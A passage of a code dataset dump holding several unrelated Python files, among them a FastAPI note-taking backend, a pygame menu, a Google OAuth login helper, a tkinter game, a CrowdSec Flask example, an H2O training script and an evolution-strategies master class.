subjectDrive.put(name=fileName, data=file.file, content_type=\"image/\"+fileExtension)\n\n #update image location in db\n subjectdb = deta.Base(\"Notecaster_Subject\")\n theSubject = subjectdb.get(key)\n theSubject['image'] = fileName\n theSubject = subjectdb.put(theSubject)\n theSubject['status'] = 200\n return theSubject\n\n@app.put(\"/api/removesubjectimage/{key}\")\ndef deleteImage(key: str = \"\", file: UploadFile = File(...), Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n subjectDrive = deta.Drive(\"Notecaster_Subject\")\n subjectdb = deta.Base(\"Notecaster_Subject\")\n theSubject = subjectdb.get(key)\n \n thatImage = theSubject['image']\n deleted_file = subjectDrive.delete(thatImage)\n \n del theSubject['image']\n \n theSubject = subjectdb.put(theSubject)\n return theSubject\n\n@app.get(\"/api/getsubjectimage/{key}\")\ndef getImage(key: str = \"\", Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n subjectDrive = deta.Drive(\"Notecaster_Subject\")\n subjectdb = deta.Base(\"Notecaster_Subject\")\n theSubject = subjectdb.get(key)\n \n try:\n imageFile = subjectDrive.get(theSubject['image'])\n imageExtension = theSubject['image'].split(\".\")[1]\n return StreamingResponse(imageFile.iter_chunks(1024), media_type=\"image/\"+imageExtension)\n except:\n return({\n \"status\": 404,\n \"message\": \"Image Does not Exist\"\n })\n \n \n@app.post(\"/api/uploadimage\")\ndef uploadImage(file: UploadFile = File(...), Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n subjectDrive = deta.Drive(\"Notecaster_Image\")\n \n fileName = str(uuid.uuid4())\n fileExtension = file.filename.split(\".\")[1]\n fileName += \".\"+fileExtension\n \n subjectDrive.put(name=fileName, data=file.file, content_type=\"image/\"+fileExtension)\n \n return {\n \"status\": 200,\n \"link\": \"https://notecaster-backend.deta.dev/getimage/\"+fileName\n }\n \n@app.get(\"/api/getimage/{imageLocation}\")\ndef getImage(imageLocation: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n subjectDrive = deta.Drive(\"Notecaster_Image\")\n try:\n imageFile = subjectDrive.get(imageLocation)\n imageExtension = imageLocation.split(\".\")[1]\n return StreamingResponse(imageFile.iter_chunks(1024), media_type=\"image/\"+imageExtension)\n except:\n return({\n \"status\": 404,\n \"message\": \"Image Does not Exist\"\n })\n \n\n#APIs for Notes\n\n#create a note for project\nclass Note(BaseModel):\n name: str\n about: str\n subject: str\n username: str\n\n@app.post(\"/api/notes\")\ndef createproject(note: Note, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n notedb = deta.Base(\"Notecaster_Note\")\n \n noter = {\n \"name\": note.name,\n \"about\": note.about,\n \"subject\": note.subject,\n \"username\": note.username\n }\n \n try:\n newNote = notedb.insert(noter)\n return newNote\n except:\n return({\n \"status\": 500,\n \"message\": \"Some Error Occurred.\"\n })\n \nclass UpdateNote(BaseModel):\n name: str\n about: str\n \n@app.put(\"/api/note/{key}\")\ndef createproject(key: str, updatenote: UpdateNote, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n notedb = deta.Base(\"Notecaster_Note\")\n \n try:\n theNote = notedb.get(key)\n theNote['name'] = updatenote.name\n theNote['about'] = updatenote.about\n theNote = notedb.put(theNote)\n return theNote\n except:\n return({\n \"status\": 404,\n \"message\": \"Note Does not Exist\"\n })\n \n@app.get(\"/api/notes/{subjectID}\")\ndef getnotes(subjectID: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n notedb = deta.Base(\"Notecaster_Note\")\n allNotes = next(notedb.fetch({\"subject\": subjectID}))\n return allNotes\n\n@app.delete(\"/api/note/{key}\")\ndef getproject(key: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n notedb = deta.Base(\"Notecaster_Note\")\n notedb.delete(key)\n return ({\n \"status\": 203,\n \"message\": \"Deleted Successfully.\"\n })\n \n except:\n return({\n \"status\": 404,\n \"message\": \"Note Does not Exist\"\n })\n \n@app.get(\"/api/note/{key}\")\ndef getnote(key: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n notedb = deta.Base(\"Notecaster_Note\")\n theNote = notedb.get(key)\n if theNote is None:\n return({\n \"status\": 404,\n \"message\": \"Note Does not Exist\"\n })\n return theNote\n \n except:\n return({\n \"status\": 404,\n \"message\": \"Note Does not Exist\"\n })\n \nclass UpdateNoteDoc(BaseModel):\n content: str \n \n@app.put(\"/api/updatenotedoc/{noteKey}\")\ndef updateNoteDoc(noteKey: str, docData: UpdateNoteDoc, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n notedb = deta.Base(\"Notecaster_Note\")\n theNote = notedb.get(noteKey)\n if theNote is None:\n return({\n \"status\": 404,\n \"message\": \"Note Does not Exist\"\n })\n theNote['content'] = docData.content\n theNote = notedb.put(theNote)\n return theNote\n\n\n#Flashcards APIs\n\nclass TypeOneCard(BaseModel):\n noteText: str\n imageLink: str\n subject: str\n \nclass TypeTwoCard(BaseModel):\n question: str\n questionImageLink: str\n answer: str\n answerImageLink: str\n subject: str\n\n@app.post(\"/api/flashcards/type1\")\ndef createCardOne(card: TypeOneCard, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n noteText = card.noteText\n imageLink = card.imageLink\n subject = card.subject\n \n carddb = deta.Base(\"Notecaster_Card\")\n \n createCard = {\n \"type\": 1,\n \"noteText\": noteText,\n \"imageLink\": imageLink,\n \"subject\": subject\n }\n \n try:\n newCard = carddb.insert(createCard)\n return newCard\n \n except:\n return({\n \"status\": 500,\n \"message\": \"Some Error Occurred.\"\n })\n \n@app.post(\"/api/flashcards/type2\")\ndef createCardTwo(card: TypeTwoCard, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n question = card.question\n questionImageLink = card.questionImageLink\n answer = card.answer\n answerImageLink = card.answerImageLink\n subject = card.subject\n \n carddb = deta.Base(\"Notecaster_Card\")\n \n createCard = {\n \"type\": 2,\n \"question\": question,\n \"questionImageLink\": questionImageLink,\n \"answer\": answer,\n \"answerImageLink\": answerImageLink,\n \"subject\": subject\n }\n \n try:\n newCard = carddb.insert(createCard)\n return newCard\n \n except:\n return({\n \"status\": 500,\n \"message\": \"Some Error Occurred.\"\n })\n \n@app.get(\"/api/flashcards/{subjectID}\")\ndef getCards(subjectID: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n carddb = deta.Base(\"Notecaster_Card\")\n allCards = next(carddb.fetch({\"subject\": subjectID}))\n return allCards\n\n@app.get(\"/api/flashcard/{key}\")\ndef getCard(key: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n carddb = deta.Base(\"Notecaster_Card\")\n theCard = carddb.get(key)\n if theCard is None:\n return({\n \"status\": 404,\n \"message\": \"Card Does not Exist\"\n })\n return theCard\n\n@app.delete(\"/api/flashcard/{key}\")\ndef deleteCard(key: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n carddb = deta.Base(\"Notecaster_Card\")\n carddb.delete(key)\n return ({\n \"status\": 203,\n \"message\": \"Deleted Successfully.\"\n })\n except:\n return({\n \"status\": 404,\n \"message\": \"Card Does not Exist\"\n })\n\nclass UpdateTypeOneCard(BaseModel):\n noteText: str\n imageLink: str\n\n@app.put(\"/api/flashcard/type1/{key}\")\ndef updateCardOne(key: str, card: UpdateTypeOneCard, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n carddb = deta.Base(\"Notecaster_Card\")\n theCard = carddb.get(key)\n theCard['noteText'] = card.noteText\n theCard['imageLink'] = card.imageLink\n theCard = carddb.put(theCard)\n return theCard\n \n except:\n return({\n \"status\": 404,\n \"message\": \"Card Does not Exist\"\n })\n \nclass UpdateTypeTwoCard(BaseModel):\n question: str\n questionImageLink: str\n answer: str\n answerImageLink: str\n \n@app.put(\"/api/flashcard/type2/{key}\")\ndef updateCardTwo(key: str, card: UpdateTypeTwoCard, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n carddb = deta.Base(\"Notecaster_Card\")\n theCard = carddb.get(key)\n theCard['question'] = card.question\n theCard['questionImageLink'] = card.questionImageLink\n theCard['answer'] = card.answer\n theCard['answerImageLink'] = card.answerImageLink\n theCard = carddb.put(theCard)\n return theCard\n \n except:\n return({\n \"status\": 404,\n \"message\": \"Card Does not Exist\"\n })\n \n\n#Sticky Notes\n#unlimited sticky notes w.r.t. subject\n\nclass StickyNote(BaseModel):\n username: str\n subjectID: str\n data: str\n imageLink: str\n backgroundColor: str\n imageColor: str\n\n@app.post(\"/api/stickynotes\")\ndef createproject(stickyNote: StickyNote, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n username = stickyNote.username\n subjectID = stickyNote.subjectID\n data = stickyNote.data\n imageLink = stickyNote.imageLink\n backgroundColor = stickyNote.backgroundColor\n imageColor = stickyNote.imageColor\n \n stickynotedb = deta.Base(\"Notecaster_StickyNote\")\n \n createStickyNote = {\n \"username\": username,\n \"subjectID\": subjectID,\n \"data\": data,\n \"imageLink\": imageLink,\n \"backgroundColor\": backgroundColor,\n \"imageColor\": imageColor\n }\n \n try:\n newStickyNote = stickynotedb.insert(createStickyNote)\n return newStickyNote\n \n except:\n return({\n \"status\": 500,\n \"message\": \"Some Error Occurred.\"\n })\n \n@app.get(\"/api/stickynotes/{subjectID}\")\ndef getprojects(subjectID: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n stickynotedb = deta.Base(\"Notecaster_StickyNote\")\n allStickyNotes = next(stickynotedb.fetch({\"subjectID\": subjectID}))\n return allStickyNotes\n\n@app.get(\"/api/stickynote/{key}\")\ndef getprojects(key: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n stickynotedb = deta.Base(\"Notecaster_StickyNote\")\n theStickyNote = stickynotedb.get(key)\n if theStickyNote is None:\n return({\n \"status\": 404,\n \"message\": \"Sticky Note Does not Exist\"\n })\n return theStickyNote\n\n@app.delete(\"/api/stickynote/{key}\")\ndef deleteCard(key: str, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n stickynotedb = deta.Base(\"Notecaster_StickyNote\")\n stickynotedb.delete(key)\n return ({\n \"status\": 203,\n \"message\": \"Deleted Successfully.\"\n })\n except:\n return({\n \"status\": 404,\n \"message\": \"Sticky Note Does not Exist\"\n })\n \nclass UpdateStickyNote(BaseModel):\n data: str\n imageLink: str\n backgroundColor: str\n imageColor: str\n \n@app.put(\"/api/stickynote/{key}\")\ndef updateStickyNote(key: str, stickyNote: UpdateStickyNote, Authorization: Optional[str] = Header(None)):\n \n if validateToken(Authorization) is False:\n return {\n \"status\": 401,\n \"message\": \"Invalid Token\"\n }\n \n try:\n stickynotedb = deta.Base(\"Notecaster_StickyNote\")\n theStickyNote = stickynotedb.get(key)\n theStickyNote['data'] = stickyNote.data\n theStickyNote['imageLink'] = stickyNote.imageLink\n theStickyNote['backgroundColor'] = stickyNote.backgroundColor\n theStickyNote['imageColor'] = stickyNote.imageColor\n theStickyNote = stickynotedb.put(theStickyNote)\n return theStickyNote\n \n except:\n return({\n \"status\": 404,\n \"message\": \"Card Does not Exist\"\n })","sub_path":"notecaster/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":22195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"648290840","text":"import pygame\nfrom const import *\nfrom pygame.sprite import Sprite\nfrom buttons import ButtonMenu, ButtonsSettings\n\nclass Menu(object):\n complexity_types = ['EASY', 'MEDIUM', 'HARD']\n game_types = ['PvP', 'PvE']\n def __init__(self, screen):\n \"\"\"\n Данный класс инициализирует все кнопки которые находятся в меню\n \"\"\"\n self.screen = screen\n self.screen_rect = self.screen.get_rect()\n self.background = pygame.image.load(\"img/bg_menu.png\")\n self.font_title = pygame.font.SysFont(\"comicsansms\", 96)\n self.text_color = BLACK\n self.title = self.font_title.render(\"Sea Battle\", True, self.text_color, None)\n self.title_rect = self.title.get_rect()\n self.title_rect.center = self.screen_rect.center\n self.title_rect.top-=100\n self.button_play = ButtonMenu(self.screen, 'PLAY', 0)\n self.button_set = ButtonMenu(self.screen, 'SETTINGS', 1)\n self.button_comp_i = 0\n self.button_gt_i = 0\n self.game_type = self.game_types[self.button_gt_i]\n self.complexity = self.complexity_types[self.button_comp_i]\n self.font_settings = pygame.font.SysFont(None, 50)\n self.print_game_type = self.font_settings.render(self.game_type, True, self.text_color, None)\n self.print_complexity = self.font_settings.render(self.complexity, True, self.text_color, None)\n self.print_game_type_rect = self.print_game_type.get_rect()\n self.print_complexity_rect = self.print_complexity.get_rect()\n self.print_complexity_rect.center = self.print_game_type_rect.center = self.screen_rect.center\n self.print_complexity_rect.top += 60\n self.button_next_comp = ButtonsSettings(self.screen, 1, 1)\n self.button_back_comp = ButtonsSettings(self.screen, -1, 1)\n self.button_next_gt = ButtonsSettings(self.screen, 1, 0)\n self.button_back_gt = ButtonsSettings(self.screen, -1, 0)\n self.button_back = ButtonMenu(screen,'BACK', 2)\n self.button_restart = ButtonMenu(screen, 'LEAVE THE GAME', 2)\n\n\n\n def draw_menu(self):\n \"\"\"\n Данная функция рисует меню\n \"\"\"\n self.screen.blit(self.background, (0, 0))\n self.screen.blit(self.title, self.title_rect)\n self.button_play.draw_button()\n self.button_set.draw_button()\n def draw_settings(self):\n \"\"\"\n Данная функция рисует окно настроек\n :return:\n \"\"\"\n self.screen.blit(self.background, (0, 0))\n self.screen.blit(self.title, self.title_rect)\n self.screen.blit(self.print_game_type, self.print_game_type_rect)\n self.screen.blit(self.print_complexity, self.print_complexity_rect)\n self.button_next_comp.draw()\n self.button_back_comp.draw()\n self.button_next_gt.draw()\n self.button_back_gt.draw()\n self.button_back.draw_button()\n\n\n\n\n\n","sub_path":"PycharmProjects/BattleShip2.0/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"21035161","text":"from amh import base, settings, models\nfrom ancoris import gapi\nfrom ancoris.gae import util\nimport logging\n\n\nclass GoogleOAuth2():\n def __init__(self, request, code=None, redirect_uri=None, mobile=False):\n self._code = code\n self._redirect_uri = redirect_uri\n self._mobile = mobile\n self._request = request\n self._request_obj = request.request\n\n def run(self):\n if self._mobile:\n cid = settings.OAUTH2_LWS_CLIENT_ID\n csk = settings.OAUTH2_LWS_CLIENT_SECRET\n else:\n logging.info('running this function')\n cid = settings.OAUTH2_CLIENT_ID\n csk = settings.OAUTH2_CLIENT_SECRET\n\n logging.info([cid, csk])\n flow = base.get_flow(self._request_obj, redirect_uri=self._redirect_uri, cid=cid, csk=csk)\n\n login_service = gapi.GooglePlusLoginService(flow, self._code)\n user_info, creds = login_service.get_user_info()\n\n return self.complete_login(user_info, creds)\n\n def complete_login(self, user_info, creds):\n domain = user_info.get('domain', None)\n email = self.get_email(user_info)\n google_id = user_info['id']\n first_name, last_name = self.get_user_name(user_info)\n\n# if not domain:\n# # no domain means they are not google apps\n\n# # models.LoginLog.log_failure(enums.LoginType.GoogleApps,\n# # email,\n# # ip_address=self._request_obj.remote_addr,\n# # failure_reason=enums.LoginFailureReason.NotGappsDomain)\n# self._request.add_message('Error logging in. Not a valid Google Apps account.', 'danger')\n# self._request.redirect_to('login')\n# return\n# elif domain not in settings.ALLOWED_DOMAINS:\n# # models.LoginLog.log_failure(enums.LoginType.GoogleApps,\n# # email,\n# # ip_address=self._request_obj.remote_addr,\n# # failure_reason=enums.LoginFailureReason.ServerRestriction)\n# self._request.add_message('Error logging in. Not a valid Google Apps domain.', 'danger')\n# self._request.redirect_to('login')\n# return\n\n # this code needs to combine 'login' and 'register and verify' in one hit\n # pseudo code:\n # 1. get user by gapps id\n # 2. if user not found, try to find by email instead, as the user may have previously logged in via password and not sso\n # 3. if user found, log in. make sure google_id, name and email are correct\n # 4. if user not found, then we need to register them, and then subsequently log them in\n\n user = models.User.get_by_google_id(google_id)\n if not user:\n user = models.User.get_by_auth_id(email)\n\n updated = False\n if user:\n if first_name and user.first_name != first_name:\n user.first_name = first_name\n updated = True\n\n if last_name and user.last_name != last_name:\n user.last_name = last_name\n updated = True\n\n if google_id and user.google_id != google_id:\n user.google_id = google_id\n updated = True\n\n if user.email != email:\n success, _ = user.replace_auth_id(email)\n if success:\n updated = True\n\n if not user.verified:\n # no need to verify now - we know who they are as they just logged in\n user.verified = True\n updated = True\n else:\n # new user - need to register them ...\n if not self.validate(email):\n return\n\n # register the user ...\n ip_address = self._request_obj.remote_addr\n user = models.User.register(email, first_name=first_name, last_name=last_name, google_id=google_id, ip_address=ip_address)\n updated = True\n\n if updated:\n user.put()\n\n # log the user in ...\n picture = self.get_profile_picture(user_info)\n user.avatar = picture\n self.login(user)\n return creds\n\n def validate(self, email):\n # check the email address isn't already registered ...\n user = models.User.by_email(email)\n if user:\n self._request.add_message('That email address is not available.', 'danger')\n self._request.redirect_to('login')\n return False\n return True\n\n def get_email(self, user_info):\n for email in user_info['emails']:\n if email['type'] == 'account':\n return email['value']\n\n def get_profile_picture(self, user_info):\n avatar = None\n if 'image' in user_info:\n image = user_info['image']\n avatar = image.get('url')\n return avatar\n\n def get_user_name(self, user_info):\n \"\"\" gets the users first and last name from the user_info dictionary \"\"\"\n\n first_name = None\n last_name = None\n\n if 'name' in user_info:\n name = user_info['name']\n first_name = name.get('givenName')\n last_name = name.get('familyName')\n elif 'displayName' in user_info:\n # potential bug here - is displayName like a pseudo name?\n # in which case we shouldn't be using it as the users profile name\n # that said, if that really is the case, then user_info['name'] should not be none, and we won't get to this code anyway, so lets leave it in for now\n if user_info.get('name'):\n first_name, last_name = util.split_name(user_info['displayName'])\n\n return first_name, last_name\n\n def login(self, user):\n # log the user, by creating a token, and using it right away\n # warning: possible eventual consistency issue here\n\n auth_token = models.User.create_auth_token(user.key.id())\n\n self._request.auth.unset_session()\n self._request.auth.get_user_by_token(user.key.id(), auth_token)\n\n user.log_login(self._request_obj.remote_addr)\n","sub_path":"src/cc/service/oauth_login.py","file_name":"oauth_login.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"185941977","text":"import os\n\nimport h2o\nfrom h2o.estimators import H2ODeepLearningEstimator\nimport pandas as pd\n\nh2o.init()\n\n\n# Load data\ninsurance = h2o.import_file(\n \"https://s3.amazonaws.com/h2o-public-test-data/smalldata/glm_test/insurance.csv\"\n)\n\n# Set factors\ninsurance[\"offset\"] = insurance[\"Holders\"].log()\ninsurance[\"Group\"] = insurance[\"Group\"].asfactor()\ninsurance[\"Age\"] = insurance[\"Age\"].asfactor()\ninsurance[\"District\"] = insurance[\"District\"].asfactor()\n\n\n# Train model\nmodel = H2ODeepLearningEstimator(\n distribution=\"tweedie\",\n hidden=[1],\n epochs=1000,\n train_samples_per_iteration=-1,\n reproducible=True,\n activation=\"Tanh\",\n single_node_mode=False,\n balance_classes=False,\n force_load_balance=False,\n seed=23123,\n tweedie_power=1.5,\n score_training_samples=0,\n score_validation_samples=0,\n stopping_rounds=0,\n)\n\nmodel.train(x=list(range(3)), y=\"Claims\", training_frame=insurance)\n\n\n# Predict\ninput = {\"District\": [1], \"Group\": \"1-1.5l\", \"Age\": \">35\", \"Holders\": [3582]}\ndf = pd.DataFrame(input)\nhf = h2o.H2OFrame(df)\n\nscore = model.predict(hf).as_data_frame().to_dict()\nprint(score[\"predict\"][0])\n\n# Save model\nmodel_file = h2o.save_model(model, path=\"data\", force=True)\n","sub_path":"algo-dev-demo/h2o-python/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"267573720","text":"from tkinter import *\nfrom tkinter import ttk\nfrom random import *\n\ndef acceuil_afficher():\n tout_effacer()\n\n L_nom.place(x=90,y=140)\n B1.place(x=150,y=250)\n\ndef acceuil_effacer():\n L_nom.place_forget()\n B1.place_forget()\n\n#fenêtre des règles :\n\n\ndef regles_afficher():\n tout_effacer()\n \n L_regles_1.place(x=130, y=20)\n L_regles_2.place(x=20,y=70)\n L_regles_3.place(x=20,y=100)\n L_regles_4.place(x=20,y=120)\n L_regles_5.place(x=190,y=220)\n B2.place(x=150,y=250)\n\ndef regles_effacer():\n L_regles_1.place_forget()\n L_regles_2.place_forget()\n L_regles_3.place_forget()\n L_regles_4.place_forget()\n L_regles_5.place_forget()\n B2.place_forget()\n\ndef tout_effacer():\n acceuil_effacer()\n regles_effacer()\n information_effacer()\n\n#fenêtre d'information :\n\ndef information_afficher():\n tout_effacer()\n\n listeCombo.place(x=20,y=20)\n E_prenom_1.place(x=40,y=100)\n E_prenom_2.place(x=40,y=120)\n B3.place(x=40,y=150)\n\ndef information_effacer():\n listeCombo.place_forget()\n E_prenom_1.place_forget()\n E_prenom_2.place_forget()\n B3.place_forget()\n\n # E_prenom_1= Entry()\n\n#fenêtre de support :\nfenetre = Tk()\nfenetre.title('Jeu de compatibilite')\nfenetre.configure(width=500,height=300,bg='#FFCCCC')\n\n#Elements de la fenetre d'acceuil\nL_nom= Label(fenetre,text=\"Bienvenue sur le jeu de compatibilité amoureuse\",fg='#CC0033',width=40)\nB1=Button(fenetre,text=\"continuer\",width=20,command=regles_afficher)\n\n#Elements de la fenetre de règles\nL_regles_1= Label (fenetre,text=\"Les règles du jeu :\", fg='#CC0033',width=30)\nL_regles_2= Label (fenetre, text=\"Les règles sont simples !\", fg='#CC0033',width=20)\nL_regles_3= Label(fenetre, text=\"Il faut entrer le prénom de deux personnes\", fg='#CC0033', width=34)\nL_regles_4= Label (fenetre,text=\"et leurs signes asstrologiques !\",fg='#CC0033',width=25)\nL_regles_5= Label (fenetre,text=\"à vous de jouer !\",fg='#CC0033',width=15)\nB2= Button(fenetre,text=\"continuer\",width=20,command=information_afficher)\n\n#Elements de la fenetre de jeu\nL_prenom_1= Label (fenetre,text=\"Prénom 1 :\",fg='#CC0033',width=20)\nL_prenom_2= Label (fenetre,text=\"Prénom 2 :\",fg='#CC0033',width=20)\nE_prenom_1= Entry (fenetre,width=30)\nE_prenom_2= Entry (fenetre,width=30)\nB3= Button(fenetre,text=\"continuer\",width=20,command=acceuil_afficher)\nlisteSignes=[\"Gémeaux\",\"Lion\"]\nlisteCombo=ttk.Combobox(fenetre, values=listeSignes)\nacceuil_afficher()\n\nfenetre.mainloop()","sub_path":"Projet_brouillon3.py","file_name":"Projet_brouillon3.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"127672758","text":"\"\"\"EMpy: Electromagnetic Python.\n\nEMpy is a suite of numerical algorithms used in electromagnetism.\n\n\"\"\"\n\n__author__ = 'Lorenzo Bolla'\n\nDOCLINES = __doc__.split('\\n')\n\n# ZIP file: python setup.py sdist\n# EXE installer: python setup.py bdist_wininst\n# see http://docs.python.org/dist/dist.html\n\nfrom setuptools import setup, find_packages\nfrom EMpy.version import version\nfrom EMpy.dependencies import dependencies\n\nsetup(\n name='EMpy',\n version=version,\n maintainer='Lorenzo Bolla',\n maintainer_email='lbolla@gmail.com',\n description=DOCLINES[0],\n long_description='\\n'.join(DOCLINES[2:]),\n url='http://lbolla.github.io/EMpy/',\n download_url='https://github.com/lbolla/EMpy',\n license='BSD',\n author='Lorenzo Bolla',\n author_email='lbolla@gmail.com',\n platforms=['Windows', 'Linux', 'Solaris', 'Mac OS-X', 'Unix'],\n packages=find_packages(),\n package_data={'EMpy': ['tests/*.py', 'doc/*.txt', '*.txt']},\n # install_requires=dependencies,\n requires=dependencies,\n provides=['EMpy'],\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Environment :: Console',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Natural Language :: English',\n 'Programming Language :: Python',\n 'Operating System :: OS Independent',\n 'Topic :: Scientific/Engineering :: Physics',\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"124110672","text":"\n\nfrom xai.brain.wordbase.nouns._ravine import _RAVINE\n\n#calss header\nclass _RAVINES(_RAVINE, ):\n\tdef __init__(self,): \n\t\t_RAVINE.__init__(self)\n\t\tself.name = \"RAVINES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"ravine\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_ravines.py","file_name":"_ravines.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"233513689","text":"from pycrowdsec.client import StreamClient\nfrom flask import Flask\nfrom flask import request, abort\n\nc = StreamClient(\n lapi_url=\"http://localhost:8080/\",\n api_key=\"\", # your crowdsec LAPI bouncer key goes here\n interval=5,\n scopes=\"\",\n)\nc.run()\n\napp = Flask(__name__)\n\n\n@app.before_request\ndef check_in_ban_list():\n action = c.cache.get(request.remote_addr)\n if not action:\n return\n if action == \"ban\":\n return \"You have been banned\"\n\n if action == \"captcha\":\n return \"You have captcha\"\n\n\n@app.route(\"/\")\ndef hello_world():\n abort(403)\n # return \"

Hello, World!

\"\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\")\n","sub_path":"examples/flask/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"213675747","text":"from lagom.core.multiprocessing import BaseIterativeMaster\n\n\nclass BaseESMaster(BaseIterativeMaster):\n \"\"\"\n Base class for master of parallelized evolution strategies (ES). \n \n It internally defines an ES algorithm. \n In each generation, it distributes all sampled solution candidates, each for one worker,\n to compute a list of object function values and then update the ES. \n \n For more details about how master class works, please refer\n to the documentation of the class, BaseIterativeMaster. \n \n All inherited subclasses should at least implement the following function:\n 1. make_es(self)\n 2. _process_es_result(self, result)\n \"\"\"\n def __init__(self,\n num_iteration, \n worker_class, \n num_worker,\n init_seed=0, \n daemonic_worker=None):\n super().__init__(num_iteration=num_iteration, \n worker_class=worker_class, \n num_worker=num_worker,\n init_seed=init_seed, \n daemonic_worker=daemonic_worker)\n # Create ES solver\n self.es = self.make_es()\n # It is better to force popsize to be number of workers\n assert self.es.popsize == self.num_worker\n \n def make_es(self):\n \"\"\"\n User-defined function to create an ES algorithm. \n \n Returns:\n es (BaseES): An instantiated object of an ES class. \n \n Examples:\n cmaes = CMAES(mu0=[3]*100, \n std0=0.5, \n popsize=12)\n return cmaes\n \"\"\"\n raise NotImplementedError\n\n def make_tasks(self, iteration):\n # ES samples new candidate solutions\n solutions = self.es.ask()\n \n # Record iteration number, for logging in _process_workers_result()\n # And it also keeps API untouched for assign_tasks() in non-iterative Master class\n self.generation = iteration\n \n return solutions\n \n def _process_workers_result(self, tasks, workers_result):\n # Rename, in ES context, the task is to evalute the solution candidate\n solutions = tasks\n \n # Unpack function values from workers results, [solution_id, function_value]\n # Note that the workers result already sorted ascendingly with respect to task ID\n function_values = [result[1] for result in workers_result]\n \n # Update ES\n self.es.tell(solutions, function_values)\n \n # Obtain results from ES\n result = self.es.result\n \n # Process the ES result\n self._process_es_result(result)\n \n def _process_es_result(self, result):\n \"\"\"\n User-defined function to process the result from ES. \n \n Note that the user can use the class memeber `self.generation` which indicate the index of\n the current generation, it is automatically incremented each time when sample a set of\n solution candidates. \n \n Args:\n result (dict): A dictionary of result returned from es.result. \n \n Examples:\n best_f_val = result['best_f_val']\n if self.generation == 0 or (self.generation+1) % 100 == 0:\n print(f'Best function value at generation {self.generation+1}: {best_f_val}')\n \"\"\"\n raise NotImplementedError\n","sub_path":"lagom/core/es/base_es_master.py","file_name":"base_es_master.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} 